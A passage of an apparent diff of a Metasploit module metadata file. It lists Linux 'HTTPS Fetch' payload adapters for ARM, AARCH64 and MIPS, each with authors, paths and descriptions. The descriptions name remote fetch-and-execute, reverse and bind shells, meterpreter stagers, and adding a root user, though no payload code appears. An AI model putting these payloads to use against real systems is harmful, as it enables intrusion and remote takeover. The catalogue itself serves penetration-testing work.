"cmd/linux/http/x86/shell_reverse_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", - "staged": false - }, - "payload_cmd/linux/https/aarch64/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/aarch64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack " - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/meterpreter", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_cmd/linux/https/aarch64/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - 
"arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/aarch64/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/aarch64/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam 
Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/aarch64/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/aarch64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/shell", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - 
"payload_cmd/linux/https/aarch64/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/armbe/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/armbe/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/armbe/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", - "is_install_path": true, - "ref_name": 
"cmd/linux/https/armbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/armbe/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/armbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Balazs Bucsay @xoreipeip " - ], - "description": "Fetch and execute an ARMBE payload from an HTTPS server.\nListen for a connection and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armbe", - "adapted_refname": "linux/armbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/armle/adduser": { - "name": "HTTPS Fetch, Linux Add User", - "fullname": "payload/cmd/linux/https/armle/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - 
"arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/adduser", - "staged": false - }, - "payload_cmd/linux/https/armle/exec": { - "name": "HTTPS Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/https/armle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nExecute an arbitrary command", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/exec", - "staged": false - }, - "payload_cmd/linux/https/armle/meterpreter/bind_tcp": { - "name": "HTTPS Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/armle/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nListen 
for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/https/armle/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/armle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo ", - "tkmru" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/reverse_tcp" - }, - 
"payload_cmd/linux/https/armle/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/armle/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/armle/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/armle/shell/bind_tcp": { - "name": "HTTPS Fetch, Linux dup2 Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/armle/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\ndup2 socket in r12, then execve.\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": 
"cmd/linux/https/armle/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/https/armle/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/armle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo ", - "tkmru" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_cmd/linux/https/armle/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/armle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ", - "hal" - ], - "description": "Fetch and execute an ARMLE 
payload from an HTTPS server.\nConnect to target and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/armle/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/armle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/mips64/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/mips64/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_https", - "staged": false - }, - 
"payload_cmd/linux/https/mips64/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/exec": { - "name": "HTTPS Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/https/mipsbe/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/exec", - "check": false, - "post_auth": false, - "default_credential": false, 
- "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/exec", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/mipsbe/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/meterpreter", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/https/mipsbe/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", - 
